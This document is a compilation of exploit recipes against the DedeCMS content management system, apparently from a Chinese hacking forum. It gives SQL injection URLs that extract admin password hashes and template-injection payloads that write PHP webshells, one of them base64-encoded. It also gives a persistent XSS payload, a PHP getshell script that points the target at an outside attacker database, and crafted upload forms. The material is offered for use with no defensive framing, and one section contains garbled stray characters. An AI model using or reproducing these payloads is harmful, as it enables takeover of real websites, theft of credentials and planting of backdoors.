Dedecms 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a "software" item; in the local address field enter: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line shell written directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS "rootkit". Note that IE8/9 block URL-based XSS, so their XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. From then on, visiting any of the URLs below in any way triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value, and you are taken straight into the site backend.

This only works if the backend path is already known.

Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database prepared, then insert a row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below; the shell is 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image. Then, in attachment management, replace the image with our crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (prepend gif89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(crafted here)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports that the edit succeeded, we have successfully changed the template path.

3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
/ y+ C: J, d- x9 w2 z9 c$ `Gif89a{dede:field name='toby57' runphp='yes'}
S6 P* Y; z7 k) I* Jphpinfo();
8 m% [6 y7 k' E% {{/dede:field}( a" [* L |" R7 f% P
保存为1.gif
6 E. }0 u" H/ \, A<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 1 n- u/ C; @0 z% _2 r) T2 [
<input type="hidden" name="aid" value="7" /> 2 j/ U6 S& W2 l, d
<input type="hidden" name="mediatype" value="1" />
& P) ~; @0 n! p( R8 k( x3 f<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> ' {- x9 N: m$ O, y! R5 E, V
<input type="hidden" name="dopost" value="save" />
a# f9 K9 _3 Z0 q- o( S( G<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> & g! M) _2 |* y/ b/ P: a! F6 w
<input name="addonfile" type="file" id="addonfile"/> " p/ E, o' X" p5 K8 N
<button class="button2" type="submit" >更改</button> / N0 w9 {8 }- R6 u' \) m' C
</form>
. f4 S8 O, y: i) T& h+ Y# b3 B/ `9 K; a, r: \7 T/ k
. F( i8 l% V+ {1 h构造如上表单,上传后图片保存为/uploads/userup/3/1.gif4 J, _: E/ c1 J5 x2 t& S; j
发表文章,然后构造修改表单如下:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5; remove 3 more from the front and 1 from the end to obtain the 16-character MD5.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
This exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS logging database error messages into a PHP file without validating the file header.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is displayed.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following information confirms the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the test.html file from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the same information as in step 2 means the file trojan was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*